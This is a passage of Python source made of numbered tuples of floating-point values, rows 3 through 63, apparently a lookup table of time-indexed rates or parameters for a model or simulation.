(2.406703117258625, 2.4250675173766973, 2.0793369564399518, 2.231872922259622, 1.774043113600507, 0.8767128119365264, 0.9924007283295911, 0.9278835262490847, 0.9720180214561457, 0.4736782698426182, 0.3356232274551589, 0.1954228561643487, 0.0, 2.4345091225016904, 2.1496514178078354, 1.6781161372757945, 1.4210348095278542, 1.9440360429122914, 1.2990369367487185, 0.9924007283295911, 0.6262234370975188, 0.8870215568002535, 0.7439576407532075, 0.41586739128799033, 0.2204606833978816, 0.0), # 3
(2.537254459366393, 2.555639239738117, 2.1912976332343455, 2.352086592414771, 1.8699052276790646, 0.9239372817263559, 1.0457887337016918, 0.9777219768658193, 1.024360272744361, 0.499155589716768, 0.3537049423060384, 0.20594327974515883, 0.0, 2.565675453175927, 2.2653760771967466, 1.7685247115301916, 1.4974667691503036, 2.048720545488722, 1.368810767612147, 1.0457887337016918, 0.6599552012331114, 0.9349526138395323, 0.7840288641382572, 0.4382595266468692, 0.23233083997619253, 0.0), # 4
(2.6658250874734044, 2.6840945174793154, 2.3014429779175063, 2.470350805716118, 1.9642586444531411, 0.9703955258879502, 1.0983115829450447, 1.0267512947540989, 1.0758532157308744, 0.5242201805918665, 0.37149350176980883, 0.21629311357447162, 0.0, 2.694714143853131, 2.3792242493191873, 1.8574675088490442, 1.572660541775599, 2.151706431461749, 1.4374518126557383, 1.0983115829450447, 0.6931396613485358, 0.9821293222265706, 0.8234502685720396, 0.46028859558350127, 0.24400859249811963, 0.0), # 5
(2.7918968591378666, 2.8099048050019837, 2.4093198428412888, 2.586179046014896, 2.0567188731402783, 1.015896467553535, 1.1497531412962525, 1.0747698815004147, 1.1262850713649086, 0.548768885935276, 0.3889157198118855, 0.22642977874922698, 0.0, 2.821094415079843, 2.4907275662414965, 1.9445785990594275, 1.6463066578058276, 2.2525701427298173, 1.5046778341005806, 1.1497531412962525, 0.7256403339668107, 1.0283594365701392, 0.8620596820049655, 0.4818639685682578, 0.25544589136381673, 0.0), # 6
(2.9149516319179876, 2.932541556707815, 2.514475080357545, 2.699084797162339, 2.146901422958014, 1.0602490298553349, 1.199897273991917, 1.1215761386912588, 1.175444060595686, 0.5726985492143588, 0.40589841039768465, 0.23631069636636431, 0.0, 2.944285487402608, 2.599417660030007, 2.029492051988423, 1.718095647643076, 2.350888121191372, 1.5702065941677623, 1.199897273991917, 0.7573207356109535, 1.073450711479007, 0.8996949323874465, 0.5028950160715091, 0.26659468697343774, 0.0), # 7
(3.034471263371974, 3.051476226998503, 2.616455542818132, 2.8085815430096783, 2.2344218031238894, 1.1032621359255743, 1.2485278462686396, 1.166968467913121, 1.2231184043724275, 0.5959060138964776, 0.42236838749262146, 0.24589328752282347, 0.0, 3.063756581367967, 2.7048261627510577, 2.111841937463107, 1.7877180416894323, 2.446236808744855, 1.6337558550783693, 1.2485278462686396, 0.7880443828039817, 1.1172109015619447, 0.936193847669893, 0.5232911085636265, 0.2774069297271367, 0.0), # 8
(3.149937611058034, 3.1661802702757416, 2.7148080825749017, 2.9141827674081506, 2.3188955228554424, 1.1447447088964797, 1.295428723363024, 1.210745270752494, 1.2690963236443564, 0.6182881234489943, 0.4382524650621119, 0.25513497331554386, 0.0, 3.178976917522465, 2.8064847064709815, 2.1912623253105594, 1.8548643703469825, 2.538192647288713, 1.6950433790534916, 1.295428723363024, 0.817674792068914, 1.1594477614277212, 0.9713942558027171, 0.5429616165149803, 0.28783457002506746, 0.0), # 9
(3.2608325325343728, 3.276125140941222, 2.8090795519797083, 3.0154019542089863, 2.3999380913702133, 1.1845056719002751, 1.340383770511671, 1.2527049487958686, 1.3131660393606952, 0.6397417213392715, 0.45347745707157167, 0.2639931748414651, 0.0, 3.2894157164126443, 2.903924923256116, 2.267387285357858, 1.9192251640178144, 2.6263320787213904, 1.7537869283142162, 1.340383770511671, 0.8460754799287679, 1.1999690456851067, 1.005133984736329, 0.5618159103959417, 0.2978295582673839, 0.0), # 10
(3.3666378853592023, 3.3807822933966425, 2.8988168033844053, 3.1117525872634193, 2.477165017885742, 1.222353948069186, 1.3831768529511832, 1.292645903629736, 1.3551157724706657, 0.660163651034672, 0.46797017748641667, 0.27242531319752705, 0.0, 3.394542198585045, 2.996678445172797, 2.339850887432083, 1.9804909531040158, 2.7102315449413314, 1.8097042650816304, 1.3831768529511832, 0.8731099629065614, 1.238582508942871, 1.03725086242114, 0.5797633606768812, 0.30734384485424027, 0.0), # 11
(3.466835527090725, 3.479623182043689, 2.9835666891408468, 3.202748150422684, 2.550191811619567, 1.2580984605354364, 1.4235918359181623, 1.3303665368405868, 1.3947337439234906, 0.6794507560025573, 0.48165744027206236, 0.28038880948066897, 0.0, 3.493825584586214, 3.0842769042873583, 2.4082872013603116, 2.0383522680076718, 2.789467487846981, 1.8625131515768216, 1.4235918359181623, 0.8986417575253116, 1.2750959058097835, 1.0675827168075616, 0.5967133378281694, 0.31632938018579, 0.0), # 12
(3.5609073152871504, 3.572119261284061, 3.062876061600887, 3.2879021275380134, 2.618633981789227, 1.2915481324312523, 1.4614125846492112, 1.3656652500149136, 1.431808174668391, 0.6974998797102906, 0.49446605939392463, 0.2878410847878307, 0.0, 3.586735094962694, 3.1662519326661376, 2.472330296969623, 2.0924996391308714, 2.863616349336782, 1.9119313500208792, 1.4614125846492112, 0.9225343803080374, 1.3093169908946134, 1.0959673758460047, 0.6125752123201775, 0.3247381146621874, 0.0), # 13
(3.6483351075066865, 3.6577419855194493, 3.1362917731163824, 3.366728002460638, 2.6821070376122638, 1.3225118868888581, 1.4964229643809324, 1.3983404447392078, 1.4661272856545895, 0.7142078656252335, 0.5063228488174191, 0.29473956021595205, 0.0, 3.6727399502610254, 3.242135162375472, 2.531614244087095, 2.1426235968757004, 2.932254571309179, 1.9576766226348912, 1.4964229643809324, 0.9446513477777557, 1.3410535188061319, 1.1222426674868795, 0.6272583546232765, 0.33252199868358634, 0.0), # 14
(3.728600761307542, 3.7359628091515464, 3.203360676039181, 3.438739259041796, 2.7402264883062153, 1.3507986470404796, 1.5284068403499251, 1.4281905225999594, 1.4974792978313092, 0.7294715572147492, 0.5171546225079614, 0.30104165686197243, 0.0, 3.7513093710277525, 3.311458225481696, 2.5857731125398065, 2.188414671644247, 2.9949585956626184, 1.9994667316399433, 1.5284068403499251, 0.9648561764574853, 1.3701132441531076, 1.1462464196805988, 0.6406721352078363, 0.33963298265014064, 0.0), # 15
(3.8011861342479203, 3.806253186582049, 3.263629622721142, 3.5034493811327145, 2.792607843088622, 1.3762173360183407, 1.5571480777927953, 1.4550138851836603, 1.5256524321477714, 0.7431877979461997, 0.5268881944309676, 0.3067047958228314, 0.0, 3.8219125778094183, 3.3737527540511447, 2.6344409721548376, 2.229563393838599, 3.0513048642955427, 2.0370194392571244, 1.5571480777927953, 0.9830123828702433, 1.396303921544311, 1.1678164603775718, 0.6527259245442284, 0.3460230169620045, 0.0), # 16
(3.86557308388603, 3.868084572212647, 3.3166454655141178, 3.560371852584634, 2.8388666111770235, 1.3985768769546667, 1.5824305419461422, 1.4786089340768032, 1.5504349095531977, 0.755253431286947, 0.5354503785518533, 0.31168639819546856, 0.0, 3.8840187911525663, 3.4285503801501536, 2.6772518927592666, 2.2657602938608403, 3.1008698191063955, 2.0700525077075245, 1.5824305419461422, 0.9989834835390476, 1.4194333055885118, 1.1867906175282115, 0.6633290931028236, 0.35164405201933163, 0.0), # 17
(3.921243467780082, 3.920928420445034, 3.3619550567699603, 3.609020157248784, 2.878618301788957, 1.4176861929816842, 1.6040380980465703, 1.4987740708658768, 1.5716149509968127, 0.7655653007043539, 0.542767988836034, 0.31594388507682386, 0.0, 3.9370972316037385, 3.475382735845062, 2.7138399441801697, 2.2966959021130613, 3.1432299019936254, 2.0982836992122276, 1.6040380980465703, 1.0126329949869173, 1.4393091508944784, 1.203006719082928, 0.672391011353992, 0.35644803822227583, 0.0), # 18
(3.9676791434882794, 3.964256185680906, 3.399105248840526, 3.648907778976395, 2.911478424141964, 1.4333542072316154, 1.6217546113306789, 1.5153076971373745, 1.5889807774278373, 0.7740202496657831, 0.5487678392489254, 0.3194346775638366, 0.0, 3.9806171197094784, 3.513781453202202, 2.7438391962446262, 2.3220607489973486, 3.1779615548556746, 2.1214307759923243, 1.6217546113306789, 1.0238244337368683, 1.455739212070982, 1.2163025929921318, 0.6798210497681053, 0.3603869259709915, 0.0), # 19
(4.0043619685688325, 3.997539322321953, 3.427642894077668, 3.679548201618706, 2.9370624874535847, 1.4453898428366878, 1.6353639470350725, 1.5280082144777862, 1.6023206097954932, 0.7805151216385962, 0.5533767437559435, 0.32211619675344644, 0.0, 4.01404767601633, 3.54327816428791, 2.766883718779717, 2.341545364915788, 3.2046412195909864, 2.139211500268901, 1.6353639470350725, 1.0324213163119198, 1.4685312437267923, 1.2265160672062356, 0.6855285788155336, 0.36341266566563213, 0.0), # 20
(4.030773800579946, 4.020249284769871, 3.44711484483324, 3.700454909026946, 2.954986000941357, 1.453602022929125, 1.644649970396352, 1.5366740244736041, 1.611422669049003, 0.7849467600901557, 0.556521516322504, 0.32394586374259315, 0.0, 4.036858121070831, 3.5634045011685243, 2.78260758161252, 2.3548402802704667, 3.222845338098006, 2.151343634263046, 1.644649970396352, 1.0382871592350893, 1.4774930004706786, 1.233484969675649, 0.689422968966648, 0.365477207706352, 0.0), # 21
(4.046396497079832, 4.031857527426353, 3.457067953459095, 3.7111413850523514, 2.96486447382282, 1.4577996706411525, 1.64939654665112, 1.5411035287113193, 1.6160751761375887, 0.7872120084878245, 0.5581289709140228, 0.3248810996282164, 0.0, 4.048517675419531, 3.5736920959103795, 2.7906448545701137, 2.361636025463473, 3.2321503522751773, 2.157544940195847, 1.64939654665112, 1.0412854790293946, 1.48243223691141, 1.237047128350784, 0.6914135906918191, 0.3665325024933049, 0.0), # 22
(4.052157345337056, 4.0332319844535895, 3.4583077274805674, 3.712479243827161, 2.9673952149420257, 1.4583333333333335, 1.6499608004518678, 1.5415823045267492, 1.6166568312757204, 0.7874792272519435, 0.5583305358107827, 0.3249965858862978, 0.0, 4.05, 3.574962444749276, 2.7916526790539136, 2.36243768175583, 3.2333136625514407, 2.158215226337449, 1.6499608004518678, 1.0416666666666667, 1.4836976074710129, 1.2374930812757206, 0.6916615454961136, 0.36665745313214454, 0.0), # 23
(4.056404965213662, 4.03243024691358, 3.4581049382716054, 3.7123145833333338, 2.9688286969639606, 1.4583333333333335, 1.6496507625272334, 1.5409166666666667, 1.6165788888888888, 0.7873150617283953, 0.5583083052749721, 0.3249695473251029, 0.0, 4.05, 3.5746650205761314, 2.7915415263748606, 2.361945185185185, 3.2331577777777776, 2.1572833333333334, 1.6496507625272334, 1.0416666666666667, 1.4844143484819803, 1.2374381944444448, 0.6916209876543211, 0.3665845679012346, 0.0), # 24
(4.060562892084632, 4.030849908550525, 3.457704618198446, 3.7119888117283955, 2.970230652158534, 1.4583333333333335, 1.649039780521262, 1.5396090534979427, 1.6164248971193418, 0.7869918838591681, 0.5582642266284242, 0.3249161713153483, 0.0, 4.05, 3.5740778844688306, 2.7913211331421213, 2.3609756515775038, 3.2328497942386836, 2.15545267489712, 1.649039780521262, 1.0416666666666667, 1.485115326079267, 1.2373296039094654, 0.6915409236396892, 0.36644090077732056, 0.0), # 25
(4.0646308076192135, 4.028515112025606, 3.457112254229539, 3.711505632716049, 2.9716010315789614, 1.4583333333333335, 1.6481373436617444, 1.5376841563786012, 1.61619683127572, 0.7865150708733427, 0.5581986989233904, 0.3248371894528274, 0.0, 4.05, 3.573209083981101, 2.7909934946169517, 2.3595452126200276, 3.23239366255144, 2.152757818930042, 1.6481373436617444, 1.0416666666666667, 1.4858005157894807, 1.2371685442386833, 0.6914224508459078, 0.3662286465477825, 0.0), # 26
(4.068608393486655, 4.02545, 3.4563333333333333, 3.71086875, 2.972939786278457, 1.4583333333333335, 1.6469529411764707, 1.5351666666666668, 1.6158966666666665, 0.7858900000000002, 0.5581121212121213, 0.32473333333333343, 0.0, 4.05, 3.572066666666667, 2.7905606060606063, 2.3576699999999997, 3.231793333333333, 2.1492333333333336, 1.6469529411764707, 1.0416666666666667, 1.4864698931392284, 1.2369562500000002, 0.6912666666666667, 0.36595000000000005, 0.0), # 27
(4.0724953313562, 4.021678715134888, 3.4553733424782807, 3.710081867283951, 2.9742468673102405, 1.4583333333333335, 1.6454960622932302, 1.532081275720165, 1.615526378600823, 0.7851220484682215, 0.558004892546868, 0.3246053345526597, 0.0, 4.05, 3.5706586800792564, 2.7900244627343396, 2.355366145404664, 3.231052757201646, 2.144913786008231, 1.6454960622932302, 1.0416666666666667, 1.4871234336551202, 1.2366939557613172, 0.6910746684956562, 0.3656071559213535, 0.0), # 28
(4.0762913028971, 4.01722540009145, 3.4542377686328307, 3.709148688271605, 2.9755222257275253, 1.4583333333333335, 1.6437761962398132, 1.5284526748971192, 1.6150879423868312, 0.7842165935070876, 0.5578774119798812, 0.3244539247065996, 0.0, 4.05, 3.568993171772595, 2.789387059899406, 2.3526497805212623, 3.2301758847736624, 2.139833744855967, 1.6437761962398132, 1.0416666666666667, 1.4877611128637627, 1.2363828960905352, 0.6908475537265663, 0.36520230909922274, 0.0), # 29
(4.079995989778599, 4.012114197530865, 3.452932098765432, 3.7080729166666666, 2.9767658125835297, 1.4583333333333335, 1.6418028322440088, 1.5243055555555556, 1.6145833333333333, 0.7831790123456793, 0.557730078563412, 0.3242798353909465, 0.0, 4.05, 3.5670781893004113, 2.78865039281706, 2.349537037037037, 3.2291666666666665, 2.134027777777778, 1.6418028322440088, 1.0416666666666667, 1.4883829062917648, 1.2360243055555558, 0.6905864197530864, 0.36473765432098776, 0.0), # 30
(4.083609073669943, 4.006369250114313, 3.4514618198445364, 3.70685825617284, 2.977977578931469, 1.4583333333333335, 1.639585459533608, 1.519664609053498, 1.6140145267489712, 0.7820146822130776, 0.5575632913497112, 0.32408379820149374, 0.0, 4.05, 3.564921780216431, 2.7878164567485557, 2.346044046639232, 3.2280290534979423, 2.1275304526748973, 1.639585459533608, 1.0416666666666667, 1.4889887894657345, 1.2356194187242802, 0.6902923639689073, 0.36421538637402845, 0.0), # 31
(4.087130236240382, 4.000014700502972, 3.4498324188385916, 3.7055084104938274, 2.979157475824559, 1.4583333333333335, 1.6371335673363998, 1.5145545267489715, 1.613383497942387, 0.7807289803383634, 0.5573774493910297, 0.32386654473403453, 0.0, 4.05, 3.5625319920743794, 2.7868872469551484, 2.3421869410150893, 3.226766995884774, 2.12037633744856, 1.6371335673363998, 1.0416666666666667, 1.4895787379122796, 1.2351694701646094, 0.6899664837677183, 0.3636377000457248, 0.0), # 32
(4.090559159159159, 3.993074691358024, 3.4480493827160497, 3.704027083333333, 2.9803054543160163, 1.4583333333333335, 1.6344566448801743, 1.5090000000000001, 1.6126922222222222, 0.7793272839506176, 0.5571729517396184, 0.32362880658436216, 0.0, 4.05, 3.559916872427983, 2.785864758698092, 2.3379818518518523, 3.2253844444444444, 2.1126000000000005, 1.6344566448801743, 1.0416666666666667, 1.4901527271580082, 1.2346756944444446, 0.68960987654321, 0.36300679012345677, 0.0), # 33
(4.093895524095524, 3.985573365340649, 3.446118198445359, 3.702417978395062, 2.9814214654590576, 1.4583333333333335, 1.631564181392722, 1.503025720164609, 1.6119426748971197, 0.7778149702789212, 0.5569501974477283, 0.3233713153482701, 0.0, 4.05, 3.557084468830971, 2.784750987238642, 2.333444910836763, 3.2238853497942395, 2.1042360082304525, 1.631564181392722, 1.0416666666666667, 1.4907107327295288, 1.2341393261316875, 0.6892236396890719, 0.3623248513946045, 0.0), # 34
(4.097139012718723, 3.977534865112025, 3.4440443529949705, 3.700684799382716, 2.9825054603068986, 1.4583333333333335, 1.6284656661018317, 1.4966563786008233, 1.6111368312757204, 0.7761974165523551, 0.5567095855676103, 0.32309480262155166, 0.0, 4.05, 3.554042828837068, 2.7835479278380513, 2.3285922496570644, 3.2222736625514408, 2.0953189300411528, 1.6284656661018317, 1.0416666666666667, 1.4912527301534493, 1.2335615997942388, 0.6888088705989942, 0.3615940786465478, 0.0), # 35
(4.100289306698002, 3.9689833333333326, 3.4418333333333337, 3.69883125, 2.983557389912756, 1.4583333333333335, 1.625170588235294, 1.489916666666667, 1.6102766666666666, 0.7744800000000003, 0.5564515151515153, 0.3228000000000001, 0.0, 4.05, 3.5508000000000006, 2.782257575757576, 2.32344, 3.220553333333333, 2.0858833333333338, 1.625170588235294, 1.0416666666666667, 1.491778694956378, 1.2329437500000002, 0.6883666666666668, 0.3608166666666667, 0.0), # 36
(4.10334608770261, 3.9599429126657517, 3.4394906264288982, 3.6968610339506176, 2.984577205329846, 1.4583333333333335, 1.6216884370208988, 1.4828312757201647, 1.609364156378601, 0.7726680978509377, 0.5561763852516941, 0.3224876390794087, 0.0, 4.05, 3.547364029873495, 2.7808819262584703, 2.3180042935528125, 3.218728312757202, 2.0759637860082307, 1.6216884370208988, 1.0416666666666667, 1.492288602664923, 1.2322870113168727, 0.6878981252857798, 0.3599948102423411, 0.0), # 37
(4.1063090374017905, 3.9504377457704623, 3.4370217192501147, 3.6947778549382724, 2.985564857611384, 1.4583333333333335, 1.6180287016864359, 1.4754248971193418, 1.6084012757201647, 0.7707670873342481, 0.5558845949203975, 0.32215845145557087, 0.0, 4.05, 3.543742966011279, 2.7794229746019874, 2.3123012620027437, 3.2168025514403293, 2.0655948559670785, 1.6180287016864359, 1.0416666666666667, 1.492782428805692, 1.2315926183127577, 0.6874043438500229, 0.35913070416095116, 0.0), # 38
(4.109177837464794, 3.940491975308642, 3.434432098765433, 3.6925854166666667, 2.9865202978105874, 1.4583333333333335, 1.6142008714596952, 1.4677222222222224, 1.60739, 0.7687823456790126, 0.5555765432098766, 0.32181316872427984, 0.0, 4.05, 3.539944855967078, 2.777882716049383, 2.306347037037037, 3.21478, 2.0548111111111114, 1.6142008714596952, 1.0416666666666667, 1.4932601489052937, 1.2308618055555558, 0.6868864197530866, 0.3582265432098766, 0.0), # 39
(4.111952169560865, 3.930129743941472, 3.4317272519433013, 3.690287422839506, 2.9874434769806717, 1.4583333333333335, 1.6102144355684662, 1.4597479423868318, 1.606332304526749, 0.7667192501143122, 0.5552526291723824, 0.32145252248132916, 0.0, 4.05, 3.5359777472946203, 2.7762631458619116, 2.300157750342936, 3.212664609053498, 2.0436471193415646, 1.6102144355684662, 1.0416666666666667, 1.4937217384903358, 1.230095807613169, 0.6863454503886602, 0.3572845221764975, 0.0), # 40
(4.114631715359251, 3.919375194330132, 3.4289126657521725, 3.6878875771604944, 2.988334346174854, 1.4583333333333335, 1.606078883240539, 1.4515267489711936, 1.6052301646090534, 0.7645831778692275, 0.5549132518601656, 0.3210772443225119, 0.0, 4.05, 3.53184968754763, 2.7745662593008276, 2.2937495336076816, 3.210460329218107, 2.0321374485596713, 1.606078883240539, 1.0416666666666667, 1.494167173087427, 1.2292958590534984, 0.6857825331504345, 0.3563068358481939, 0.0), # 41
(4.1172161565292, 3.908252469135803, 3.425993827160495, 3.685389583333334, 2.9891928564463486, 1.4583333333333335, 1.6018037037037036, 1.4430833333333335, 1.6040855555555558, 0.7623795061728398, 0.5545588103254772, 0.3206880658436215, 0.0, 4.05, 3.5275687242798353, 2.7727940516273852, 2.2871385185185185, 3.2081711111111115, 2.020316666666667, 1.6018037037037036, 1.0416666666666667, 1.4945964282231743, 1.2284631944444449, 0.685198765432099, 0.35529567901234577, 0.0), # 42
(4.119705174739957, 3.8967857110196618, 3.4229762231367173, 3.6827971450617287, 2.990018958848374, 1.4583333333333335, 1.5973983861857501, 1.434442386831276, 1.6029004526748971, 0.7601136122542298, 0.5541897036205679, 0.32028571864045124, 0.0, 4.05, 3.523142905044963, 2.770948518102839, 2.2803408367626887, 3.2058009053497942, 2.0082193415637866, 1.5973983861857501, 1.0416666666666667, 1.495009479424187, 1.2275990483539099, 0.6845952446273434, 0.35425324645633294, 0.0), # 43
(4.122098451660771, 3.8849990626428896, 3.4198653406492916, 3.680113966049383, 2.9908126044341454, 1.4583333333333335, 1.592872419914468, 1.4256286008230457, 1.6016768312757201, 0.7577908733424785, 0.5538063307976889, 0.3198709343087945, 0.0, 4.05, 3.5185802773967385, 2.7690316539884443, 2.273372620027435, 3.2033536625514403, 1.9958800411522641, 1.592872419914468, 1.0416666666666667, 1.4954063022170727, 1.2267046553497947, 0.6839730681298584, 0.35318173296753547, 0.0), # 44
(4.1243956689608865, 3.872916666666667, 3.4166666666666674, 3.6773437500000004, 2.991573744256879, 1.4583333333333335, 1.5882352941176472, 1.416666666666667, 1.6004166666666664, 0.755416666666667, 0.553409090909091, 0.3194444444444445, 0.0, 4.05, 3.5138888888888884, 2.7670454545454546, 2.2662500000000003, 3.2008333333333328, 1.9833333333333336, 1.5882352941176472, 1.0416666666666667, 1.4957868721284395, 1.2257812500000003, 0.6833333333333335, 0.3520833333333334, 0.0), # 45
(4.126596508309553, 3.8605626657521714, 3.4133856881572933, 3.674490200617284, 2.992302329369791, 1.4583333333333335, 1.5834964980230777, 1.407581275720165, 1.5991219341563785, 0.7529963694558759, 0.552998383007025, 0.3190069806431947, 0.0, 4.05, 3.509076787075141, 2.7649919150351248, 2.258989108367627, 3.198243868312757, 1.970613786008231, 1.5834964980230777, 1.0416666666666667, 1.4961511646848955, 1.2248300668724283, 0.6826771376314588, 0.35096024234110657, 0.0), # 46
(4.128700651376014, 3.8479612025605854, 3.4100278920896208, 3.6715570216049382, 2.992998310826098, 1.4583333333333335, 1.5786655208585494, 1.3983971193415639, 1.597794609053498, 0.7505353589391863, 0.552574606143742, 0.3185592745008384, 0.0, 4.05, 3.5041520195092213, 2.7628730307187097, 2.2516060768175583, 3.195589218106996, 1.9577559670781894, 1.5786655208585494, 1.0416666666666667, 1.496499155413049, 1.2238523405349797, 0.6820055784179242, 0.3498146547782351, 0.0), # 47
(4.130707779829518, 3.835136419753087, 3.4065987654320993, 3.6685479166666672, 2.993661639679016, 1.4583333333333335, 1.5737518518518518, 1.3891388888888891, 1.5964366666666667, 0.7480390123456792, 0.5521381593714928, 0.31810205761316873, 0.0, 4.05, 3.4991226337448555, 2.7606907968574634, 2.244117037037037, 3.1928733333333335, 1.944794444444445, 1.5737518518518518, 1.0416666666666667, 1.496830819839508, 1.222849305555556, 0.6813197530864199, 0.34864876543209883, 0.0), # 48
(4.132617575339315, 3.8221124599908545, 3.403103795153178, 3.665466589506173, 2.9942922669817618, 1.4583333333333335, 1.5687649802307755, 1.3798312757201647, 1.5950500823045266, 0.7455127069044355, 0.5516894417425283, 0.31763606157597934, 0.0, 4.05, 3.4939966773357725, 2.7584472087126413, 2.2365381207133064, 3.190100164609053, 1.9317637860082308, 1.5687649802307755, 1.0416666666666667, 1.4971461334908809, 1.221822196502058, 0.6806207590306357, 0.34746476909007773, 0.0), # 49
(4.134429719574647, 3.8089134659350714, 3.399548468221308, 3.6623167438271604, 2.9948901437875506, 1.4583333333333335, 1.56371439522311, 1.3704989711934157, 1.5936368312757199, 0.742961819844536, 0.5512288523090992, 0.3171620179850633, 0.0, 4.05, 3.4887821978356963, 2.7561442615454963, 2.2288854595336076, 3.1872736625514397, 1.9186985596707822, 1.56371439522311, 1.0416666666666667, 1.4974450718937753, 1.220772247942387, 0.6799096936442617, 0.346264860539552, 0.0), # 50
(4.136143894204764, 3.7955635802469136, 3.3959382716049387, 3.659102083333334, 2.9954552211495997, 1.4583333333333335, 1.558609586056645, 1.3611666666666666, 1.592198888888889, 0.7403917283950618, 0.5507567901234569, 0.31668065843621407, 0.0, 4.05, 3.483487242798354, 2.7537839506172843, 2.221175185185185, 3.184397777777778, 1.9056333333333335, 1.558609586056645, 1.0416666666666667, 1.4977276105747999, 1.2197006944444448, 0.6791876543209877, 0.34505123456790127, 0.0), # 51
(4.137759780898912, 3.782086945587563, 3.39227869227252, 3.6558263117283953, 2.995987450121124, 1.4583333333333335, 1.5534600419591706, 1.3518590534979422, 1.590738230452675, 0.7378078097850939, 0.5502736542378519, 0.3161927145252249, 0.0, 4.05, 3.4781198597774736, 2.7513682711892593, 2.2134234293552812, 3.18147646090535, 1.8926026748971192, 1.5534600419591706, 1.0416666666666667, 1.497993725060562, 1.218608770576132, 0.678455738454504, 0.3438260859625058, 0.0), # 52
(4.139277061326338, 3.768507704618199, 3.388575217192502, 3.6524931327160495, 2.996486781755341, 1.4583333333333335, 1.5482752521584766, 1.3426008230452677, 1.5892568312757203, 0.735215441243713, 0.5497798437045351, 0.3156989178478891, 0.0, 4.05, 3.4726880963267797, 2.7488992185226753, 2.2056463237311386, 3.1785136625514405, 1.8796411522633747, 1.5482752521584766, 1.0416666666666667, 1.4982433908776704, 1.21749771090535, 0.6777150434385005, 0.3425916095107454, 0.0), # 53
(4.140695417156286, 3.7548500000000002, 3.3848333333333334, 3.64910625, 2.996953167105467, 1.4583333333333335, 1.543064705882353, 1.3334166666666667, 1.5877566666666667, 0.7326200000000002, 0.5492757575757575, 0.31520000000000004, 0.0, 4.05, 3.4672, 2.7463787878787875, 2.1978600000000004, 3.1755133333333334, 1.8667833333333332, 1.543064705882353, 1.0416666666666667, 1.4984765835527336, 1.2163687500000002, 0.6769666666666667, 0.3413500000000001, 0.0), # 54
(4.142014530058009, 3.741137974394147, 3.381058527663466, 3.6456693672839506, 2.997386557224717, 1.4583333333333335, 1.5378378923585896, 1.3243312757201646, 1.5862397119341562, 0.7300268632830363, 0.5487617949037703, 0.31469669257735106, 0.0, 4.05, 3.4616636183508613, 2.743808974518851, 2.1900805898491087, 3.1724794238683125, 1.8540637860082305, 1.5378378923585896, 1.0416666666666667, 1.4986932786123586, 1.2152231224279837, 0.6762117055326933, 0.34010345221764976, 0.0), # 55
(4.143234081700749, 3.7273957704618197, 3.377256287151349, 3.642186188271605, 2.9977869031663094, 1.4583333333333335, 1.5326043008149763, 1.3153693415637862, 1.584707942386831, 0.7274414083219024, 0.5482383547408239, 0.31418972717573546, 0.0, 4.05, 3.4560869989330896, 2.7411917737041196, 2.182324224965707, 3.169415884773662, 1.8415170781893007, 1.5326043008149763, 1.0416666666666667, 1.4988934515831547, 1.2140620627572019, 0.6754512574302699, 0.33885416095107457, 0.0), # 56
(4.144353753753753, 3.7136475308641974, 3.373432098765433, 3.638660416666667, 2.9981541559834577, 1.4583333333333335, 1.5273734204793028, 1.306555555555556, 1.5831633333333335, 0.7248690123456792, 0.5477058361391696, 0.3136798353909465, 0.0, 4.05, 3.4504781893004113, 2.7385291806958474, 2.1746070370370374, 3.166326666666667, 1.8291777777777782, 1.5273734204793028, 1.0416666666666667, 1.4990770779917288, 1.212886805555556, 0.6746864197530866, 0.33760432098765436, 0.0), # 57
(4.145373227886272, 3.69991739826246, 3.369591449474166, 3.6350957561728396, 2.99848826672938, 1.4583333333333335, 1.5221547405793594, 1.297914609053498, 1.5816078600823045, 0.7223150525834479, 0.5471646381510581, 0.3131677488187777, 0.0, 4.05, 3.444845237006554, 2.7358231907552906, 2.166945157750343, 3.163215720164609, 1.8170804526748974, 1.5221547405793594, 1.0416666666666667, 1.49924413336469, 1.2116985853909468, 0.6739182898948333, 0.33635612711476914, 0.0), # 58
(4.146292185767549, 3.6862295153177866, 3.365739826245999, 3.631495910493827, 2.9987891864572918, 1.4583333333333335, 1.5169577503429357, 1.289471193415638, 1.580043497942387, 0.7197849062642893, 0.5466151598287401, 0.3126541990550222, 0.0, 4.05, 3.439196189605243, 2.7330757991437, 2.1593547187928674, 3.160086995884774, 1.8052596707818933, 1.5169577503429357, 1.0416666666666667, 1.4993945932286459, 1.210498636831276, 0.6731479652492, 0.3351117741197988, 0.0), # 59
(4.147110309066831, 3.6726080246913586, 3.3618827160493825, 3.6278645833333334, 2.9990568662204096, 1.4583333333333335, 1.5117919389978214, 1.2812500000000002, 1.5784722222222225, 0.7172839506172841, 0.546057800224467, 0.3121399176954733, 0.0, 4.05, 3.4335390946502056, 2.7302890011223346, 2.151851851851852, 3.156944444444445, 1.7937500000000002, 1.5117919389978214, 1.0416666666666667, 1.4995284331102048, 1.2092881944444447, 0.6723765432098766, 0.33387345679012354, 0.0), # 60
(4.147827279453366, 3.6590770690443533, 3.3580256058527667, 3.624205478395062, 2.9992912570719494, 1.4583333333333335, 1.5066667957718067, 1.2732757201646092, 1.5768960082304526, 0.7148175628715137, 0.5454929583904894, 0.3116256363359245, 0.0, 4.05, 3.4278819996951686, 2.7274647919524466, 2.1444526886145407, 3.1537920164609052, 1.7825860082304528, 1.5066667957718067, 1.0416666666666667, 1.4996456285359747, 1.2080684927983543, 0.6716051211705534, 0.3326433699131231, 0.0), # 61
(4.148442778596402, 3.6456607910379515, 3.3541739826246006, 3.6205222993827166, 2.999492310065129, 1.4583333333333335, 1.5015918098926813, 1.2655730452674898, 1.5753168312757202, 0.7123911202560588, 0.5449210333790582, 0.31111208657216893, 0.0, 4.05, 3.4222329522938577, 2.7246051668952904, 2.137173360768176, 3.1506336625514404, 1.7718022633744859, 1.5015918098926813, 1.0416666666666667, 1.4997461550325646, 1.2068407664609058, 0.6708347965249202, 0.33142370827617745, 0.0), # 62
(4.148956488165184, 3.6323833333333333, 3.350333333333334, 3.6168187500000006, 2.9996599762531617, 1.4583333333333335, 1.4965764705882352, 1.2581666666666669, 1.5737366666666666, 0.7100100000000001, 0.5443424242424244, 0.31060000000000004, 0.0, 4.05, 3.4166, 2.721712121212122, 2.13003, 3.147473333333333, 1.7614333333333339, 1.4965764705882352, 1.0416666666666667, 1.4998299881265809, 1.2056062500000004, 0.6700666666666668, 0.3302166666666667, 0.0), # 63
